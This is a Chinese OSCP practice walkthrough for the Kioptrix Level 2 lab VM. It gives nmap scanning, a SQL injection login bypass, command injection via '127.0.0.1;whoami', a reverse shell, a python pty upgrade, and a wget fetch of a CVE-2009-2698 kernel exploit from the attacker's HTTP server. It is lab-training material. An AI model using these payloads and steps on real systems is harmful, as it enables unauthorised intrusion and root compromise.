oscp学习之路，Kioptix Level2靶场通关教程

oscp学习之路，Kioptix Level2靶场通关教程

靶场下载：Kioptrix Level 2.zip

链接: https://pan.baidu.com/s/1gxVRhrzLW1oI_MhcfWPn0w?pwd=1111 提取码: 1111

搭建好靶场之后输入ip a看一下攻击机的IP。

确定好本机IP后，使用nmap扫描网段，

nmap 192.168.0.1/24

扫描发现靶机，靶机IP为192.168.0.106，开放端口为22、80、111、443、631、3306，访问页面端进行查看

一个登录框，扫描一下目录看看

访问后是一个apache的说明，唯一的信息就是apache的版本信息了，在次回到登录的原始页面，先拿弱口令和万能密码试试，使用**<font style="color:rgb(64, 64, 64);background-color:rgb(236, 236, 236);">admin' OR '1'='1/admin</font>**万能密码成功登录

看起来页面少了输入的表格，查看一下源代码，

发现在源代码中代码有误导致其没有显示出来——center后面少一个'，并且表单数据将被发送到 <font style="color:rgb(64, 64, 64);">pingit.php</font> 文件进行处理，处理结果将在新标签页中显示。进入编辑模式，复制粘贴对其进行修改补全。

				<td align='center'><input type="text" name="ip" size="30"><input type="submit" value="submit" name="submit"></td></td>

修改完成后成功出现输入框和提交按钮。

输入127.0.0.1试试。

通过在后面衔接命令查看是否执行，输入127.0.0.1;whoami，提交后效果如图：

既然whoami可以执行，那么我们也可以通过写一个反弹shell来获取shell，成功弹回，

此时还不是交互式shell，通过**<font style="color:rgb(64, 64, 64);background-color:rgb(236, 236, 236);">python -c 'import pty; pty.spawn("/bin/bash")'</font>**指令构造伪终端。

接下来就该提权，查看一下系统的版本看是否存在漏洞

bash-3.00$ uname -a
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
bash-3.00$ lsb_release -a
lsb_release -a
LSB Version:    :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description:    CentOS release 4.5 (Final)
Release:        4.5
Codename:       Final

CentOS系统** 4.5，内核版本为 2.6.9-55.EL**，很古老的版本了，网上查一下漏洞，这里使用的是[CVE-2009-2698](https://github.com/xiaoxiaoleo/CVE-2009-2698)下载exp，在本地使用python http.server 5555 启动一个http的服务

在靶机上进行下载，第一次下载的时候失败，发现是没有写入权限，切换到tmp目录下再次使用wget http://192.168.0109:5555/exp进行下载

成功下载，加权进行执行

运行后输入whoami发现成功提权，完成通关！